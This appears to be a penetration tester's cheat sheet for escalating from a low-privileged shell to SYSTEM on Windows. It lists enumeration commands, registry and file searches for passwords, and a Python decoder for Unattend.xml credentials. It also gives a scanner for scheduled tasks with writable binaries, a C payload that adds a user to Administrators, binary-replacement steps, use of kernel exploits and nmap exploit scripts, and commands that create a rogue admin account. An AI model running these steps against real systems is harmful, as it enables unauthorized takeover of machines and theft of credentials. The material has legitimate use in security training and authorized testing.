Privilege Escalation in Windows
- Goal: get Administrator / SYSTEM privilege on a Windows box from a low-privileged shell.
- Scheduled task files live under C:\Windows\Tasks; check who can write there:
icacls C:\Windows\Tasks
- GOOD REF: https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Windows%20-%20Privilege%20Escalation.md#search-the-registry-for-key-names-and-passwords
- Windows-Exploit-Suggester (compares the patch level in systeminfo against Microsoft's bulletin database): https://raw.githubusercontent.com/AonCyberLabs/Windows-Exploit-Suggester/master/windows-exploit-suggester.py
- On the attacker machine, fetch the bulletin database first:
cd win-exp-suggester
python windows-exploit-suggester.py --update
- On the victim:
systeminfo
and save the output to win7sp1-systeminfo.txt. Then, on the attacker machine:
python windows-exploit-suggester.py --database 2014-06-06-mssb.xlsx --systeminfo ../win7sp1-systeminfo.txt
(The database filename is the date it was downloaded. Microsoft stopped publishing the bulletin spreadsheet in 2017, so the tool only covers patch levels up to then; for newer systems compare the installed KBs by hand.)
- https://guif.re/windowseop
- Windows 2000 commands: http://www.cs.toronto.edu/~simon/howto/win2kcommands.html
- Get OS: systeminfo | findstr /B /C:"OS Name" /C:"OS Version"
- Get OS 32 or 64 bit: set pro (prints PROCESSOR_ARCHITECTURE and the other PROCESSOR_* variables; frequently used)
- Get hostname: hostname
- Get username: echo %username% (prints nothing in some reverse shells; whoami is the reliable alternative)
- Get all users: net users
- Get a user: net user [username]
- Get interfaces: ipconfig /all
- Get routes: route print
- Get ARP: arp -a
- Get active connections: netstat -ano
- (WinXP SP2 and later) Get firewall rules: netsh firewall show state
- (WinXP SP2 and later) Get firewall config: netsh firewall show config
- (The netsh firewall context is deprecated from Win7 on; use netsh advfirewall firewall show rule name=all there)
- Get scheduled tasks: schtasks /query /fo LIST /v (frequently used)
- Get processes linked to services: tasklist /SVC (frequently used)
- Get started services: net start
- (Win7 and 8, works as a normal user) WMIC command line help: wmic /?
- (Win7 and 8, works as a normal user) Get installed hotfixes from WMIC: wmic qfe get Caption,Description,HotFixID,InstalledOn
- (Win7 and 8, works as a normal user) Check whether specific patches are installed: wmic qfe get Caption,Description,HotFixID,InstalledOn | findstr /C:"KB.." /C:"KB.." (replace KB.. with the KB numbers of the patches you are interested in)
Search these files for clear-text passwords (or search the whole OS)
- c:\sysprep.inf
- c:\sysprep\sysprep.xml
- %WINDIR%\Panther\Unattend\Unattended.xml
- %WINDIR%\Panther\Unattended.xml
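The Unattend/sysprep files above usually do not hold the password in the clear: when the file's PlainText element is false, Windows stores base64 of the UTF-16LE string "password + element name" (for example "Summer2014!AdministratorPassword"), so a grep for "password" finds the element but not the secret. The following added example (mine, not part of the original notes) parses an Unattend.xml, decodes both forms and strips the appended element name. The XML sample is constructed inside the block and its encoded values are produced by the block's own encoder so they are internally consistent; the account names and passwords in it are invented.

```python
import base64
import xml.etree.ElementTree as ET

NS = "urn:schemas-microsoft-com:unattend"


def encode_unattend_value(password, element_name):
    """Encode a password the way Windows stores it when PlainText is false:
    base64( UTF-16LE( password + element_name ) )."""
    return base64.b64encode((password + element_name).encode("utf-16-le")).decode("ascii")


def decode_unattend_value(value, element_name, plain_text):
    """Recover the cleartext from a <Value> element; element_name is
    "Password" or "AdministratorPassword" and is stripped off the decoded text."""
    if plain_text:
        return value
    text = base64.b64decode(value).decode("utf-16-le")
    return text[:-len(element_name)] if text.endswith(element_name) else text


def extract_unattend_passwords(xml_text):
    """Return [(element, account, cleartext)] for every password element in the file."""
    root = ET.fromstring(xml_text)
    # ElementTree has no parent pointers; build a map so we can find the sibling account name.
    parents = {child: parent for parent in root.iter() for child in parent}
    found = []
    for elem in root.iter():
        name = elem.tag.rsplit("}", 1)[-1]          # drop the namespace prefix
        if name not in ("AdministratorPassword", "Password"):
            continue
        value = elem.find(f"{{{NS}}}Value")
        if value is None or not value.text:
            continue
        flag = elem.find(f"{{{NS}}}PlainText")
        plain = flag is None or flag.text.strip().lower() == "true"
        account = None
        parent = parents.get(elem)
        if parent is not None:                      # AutoLogon uses Username, LocalAccount uses Name
            for tag in ("Username", "Name"):
                node = parent.find(f"{{{NS}}}{tag}")
                if node is not None:
                    account = node.text
        if name == "AdministratorPassword":
            account = "Administrator"
        found.append((name, account, decode_unattend_value(value.text.strip(), name, plain)))
    return found


# Constructed sample file (hypothetical accounts and passwords, not from any real host).
UNATTEND_XML = f"""<?xml version="1.0" encoding="utf-8"?>
<unattend xmlns="{NS}">
  <settings pass="oobeSystem">
    <component name="Microsoft-Windows-Shell-Setup">
      <UserAccounts>
        <AdministratorPassword>
          <Value>{encode_unattend_value("Summer2014!", "AdministratorPassword")}</Value>
          <PlainText>false</PlainText>
        </AdministratorPassword>
        <LocalAccounts>
          <LocalAccount>
            <Name>deploy</Name>
            <Group>Administrators</Group>
            <Password>
              <Value>Deploy#1</Value>
              <PlainText>true</PlainText>
            </Password>
          </LocalAccount>
        </LocalAccounts>
      </UserAccounts>
      <AutoLogon>
        <Username>svc_kiosk</Username>
        <Password>
          <Value>{encode_unattend_value("K1osk-Autologon", "Password")}</Value>
          <PlainText>false</PlainText>
        </Password>
      </AutoLogon>
    </component>
  </settings>
</unattend>
"""

if __name__ == "__main__":
    for element, account, secret in extract_unattend_passwords(UNATTEND_XML):
        print(f"{element:22} {account or '-':14} {secret}")
```

Point the script at the real files (type C:\Windows\Panther\Unattend.xml etc.) instead of the embedded sample; the widely seen value UABhAHMAcwB3AG8AcgBkAEEAZABtAGkAbgBpAHMAdAByAGEAdABvAHIAUABhAHMAcwB3AG8AcgBkAA== decodes to the literal password "Password" once the suffix is removed.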
Search for passwords
- Search for filenames (dir takes several patterns at once; the "==" separators seen in some cheat sheets are just ignored as non-matching patterns):
dir /s *pass* *cred* *vnc* *.config*
- Search for keywords in files:
findstr /si password *.xml *.ini *.txt
- Search for keywords in registry HKLM :
reg query HKLM /f password /t REG_SZ /s
- Search for keywords in registry HKCU:
reg query HKCU /f password /t REG_SZ /s
Check scheduled tasks and running processes and find the executables they run.
- icacls C:\Windows\Tasks
- Get scheduled tasks (note the "Task To Run" and "Run As User" fields): schtasks /query /fo LIST /v (frequently used)
- Get processes linked to services: tasklist /SVC (frequently used)
Check the file permissions of those executables. Look for Everyone (or BUILTIN\Users, Authenticated Users) with Full (F), Modify (M) or Write (W) permission on something that runs as SYSTEM.
- WinXP and lower: use cacls
- New Windows: use icacls.
- Example of a weak ACL (Everyone has Full control on a binary executed by a SYSTEM task):

```
c:\Program Files\Photodex\ProShow Producer>icacls scsiaccess.exe
scsiaccess.exe NT AUTHORITY\SYSTEM:(I)(F)
               BUILTIN\Administrators:(I)(F)
               BUILTIN\Users:(I)(RX)
               APPLICATION PACKAGE AUTHORITY\ALL APPLICATION PACKAGES:(I)(RX)
               Everyone:(I)(F)
```
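The two checks above (which tasks run as SYSTEM, and who can write to the binary they run) are tedious to do by eye on a host with dozens of tasks. The following added example (mine, not from the original notes) automates it offline: it parses saved output of schtasks /query /fo LIST /v and icacls, and reports SYSTEM tasks whose executable carries a write-capable allow ACE for a low-privileged principal. The schtasks and icacls text is constructed to mirror the real formats; the host name, task names, the set of low-privileged principals and the set of rights treated as write-capable are my assumptions and should be extended with the compromised account's own groups (whoami /groups).

```python
import re

# Constructed sample (not from the page): the relevant fields of
# "schtasks /query /fo LIST /v" for three tasks on a hypothetical host.
SCHTASKS_LIST = r"""
HostName:                             WIN7SP1
TaskName:                             \Photodex Sync
Status:                               Ready
Task To Run:                          "C:\Program Files\Photodex\ProShow Producer\scsiaccess.exe" /sync
Run As User:                          SYSTEM

HostName:                             WIN7SP1
TaskName:                             \Defrag
Task To Run:                          C:\Windows\System32\defrag.exe C: /U
Run As User:                          SYSTEM

HostName:                             WIN7SP1
TaskName:                             \UserCleanup
Task To Run:                          C:\Users\low\cleanup.bat
Run As User:                          WIN7SP1\low
"""

# Constructed "icacls <file>" output for the two binaries run by SYSTEM tasks.
ICACLS_OUTPUT = {
    r"C:\Program Files\Photodex\ProShow Producer\scsiaccess.exe": r"""C:\Program Files\Photodex\ProShow Producer\scsiaccess.exe NT AUTHORITY\SYSTEM:(I)(F)
                                                          BUILTIN\Administrators:(I)(F)
                                                          BUILTIN\Users:(I)(RX)
                                                          APPLICATION PACKAGE AUTHORITY\ALL APPLICATION PACKAGES:(I)(RX)
                                                          Everyone:(I)(F)

Successfully processed 1 files; Failed processing 0 files
""",
    r"C:\Windows\System32\defrag.exe": r"""C:\Windows\System32\defrag.exe NT SERVICE\TrustedInstaller:(F)
                               NT AUTHORITY\SYSTEM:(RX)
                               BUILTIN\Administrators:(RX)
                               BUILTIN\Users:(RX)

Successfully processed 1 files; Failed processing 0 files
""",
}

# Assumed: principals every low-privileged local user belongs to.
LOW_PRIV_PRINCIPALS = {"everyone", r"builtin\users",
                       r"nt authority\authenticated users", r"nt authority\interactive"}
# Assumed: icacls rights that allow replacing or modifying the file, not only F.
WRITE_RIGHTS = {"F", "M", "W", "D", "WD", "AD", "WDAC", "WO", "GW", "GA"}
PRIVILEGED_RUNAS = {"system", r"nt authority\system", "localsystem"}

ACE_RE = re.compile(r"^(.+?):((?:\([^()]*\))+)$")   # principal:(flag)(flag)(rights)


def parse_icacls(path, text):
    """Return [(principal, [flags], [rights])] for one file's icacls output."""
    aces = []
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("Successfully processed"):
            continue
        if line.startswith(path):            # the first line carries the path itself
            line = line[len(path):].strip()
        m = ACE_RE.match(line)
        if not m:
            continue
        groups = re.findall(r"\(([^()]*)\)", m.group(2))
        aces.append((m.group(1), groups[:-1], groups[-1].split(",")))
    return aces


def weak_principals(path, text):
    """Low-privileged principals holding a write-capable allow ACE on path."""
    hits = []
    for who, flags, rights in parse_icacls(path, text):
        if "DENY" in flags:                  # icacls marks deny ACEs with (DENY)
            continue
        if who.lower() in LOW_PRIV_PRINCIPALS and WRITE_RIGHTS & set(rights):
            hits.append(who)
    return hits


def parse_schtasks(text):
    """Split schtasks LIST output into one dict per task, keyed by field name."""
    tasks, current = [], {}
    for line in text.splitlines():
        if not line.strip():
            if current:
                tasks.append(current)
                current = {}
            continue
        m = re.match(r"^([^:]+):\s+(.*)$", line)
        if m:
            current[m.group(1).strip()] = m.group(2).strip()
    if current:
        tasks.append(current)
    return tasks


def executable_of(task_to_run):
    """Program from a 'Task To Run' value: quoted path, else the first token
    (unquoted paths containing spaces are ambiguous and need manual review)."""
    if task_to_run.startswith('"'):
        return task_to_run[1:task_to_run.index('"', 1)]
    return task_to_run.split()[0]


def find_hijackable_tasks(schtasks_text, icacls_lookup):
    """SYSTEM tasks whose binary a low-privileged principal can overwrite."""
    findings = []
    for task in parse_schtasks(schtasks_text):
        if task.get("Run As User", "").lower() not in PRIVILEGED_RUNAS:
            continue
        exe = executable_of(task.get("Task To Run", ""))
        acl_text = icacls_lookup.get(exe)
        if acl_text is None:
            continue                         # not enumerated yet: run icacls on it
        weak = weak_principals(exe, acl_text)
        if weak:
            findings.append((task["TaskName"], exe, weak))
    return findings


if __name__ == "__main__":
    for name, exe, weak in find_hijackable_tasks(SCHTASKS_LIST, ICACLS_OUTPUT):
        print(f"{name}: {exe} is writable by {', '.join(weak)}")
```

On a real engagement, redirect schtasks /query /fo LIST /v and icacls for each "Task To Run" binary into files and feed those in; the same ACE parser applies to service binaries found through tasklist /SVC. Note that M and W entries, and granular rights such as WD or WDAC, give the same outcome as the Everyone:(F) in the listing above.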
Create a useradd program that adds the user "low" to Administrators
root@kali:~# cat useradd.c
```c
#include <stdlib.h> /* system */

/* Runs with the rights of whatever starts scsiaccess.exe (SYSTEM here) and adds
   the existing low-privileged user "low" to the local Administrators group. */
int main(void)
{
    system("net localgroup administrators low /add");
    return 0;
}
```
Compile useradd.c into a binary with the same name as the weakly-permissioned file, so Windows runs it in its place
- Windows 32-bit target: root@kali:~# i686-w64-mingw32-gcc -o scsiaccess.exe useradd.c
- Windows 64-bit target: root@kali:~# x86_64-w64-mingw32-gcc -o scsiaccess.exe useradd.c (a 32-bit build also runs on 64-bit Windows under WoW64; -lws2_32 is not needed since the program does no networking)
Back up the original scsiaccess.exe, then overwrite it with the evil scsiaccess.exe (the Everyone:(F) ACE is what lets a normal user do this).
Wait for scsiaccess.exe to be executed (scheduled task trigger, service restart or reboot), then confirm with: net localgroup administrators
Check https://www.exploit-db.com for a kernel exploit matching the patch level from systeminfo. Most of the scripts there are in python.
- Eg.: Windows 7 SP1 escalation
OR scan for exploitable services with nmap's exploit scripts (these actually attempt exploitation, so only run them where that is in scope):
nmap --script exploit -Pn $ip
In Windows, convert the python file to a Windows exe:
python pyinstaller.py --onefile ms11-080.py
(with current PyInstaller releases the invocation is pyinstaller --onefile ms11-080.py)
OR convert the python file to a Windows exe in Linux.
Copy the above exe to the victim machine.
Execute the exe as a low-privileged user to get a SYSTEM shell.
Add a new admin user (net user only creates the account; the second command makes it an administrator):
net user newuser newpass /add
net localgroup administrators newuser /add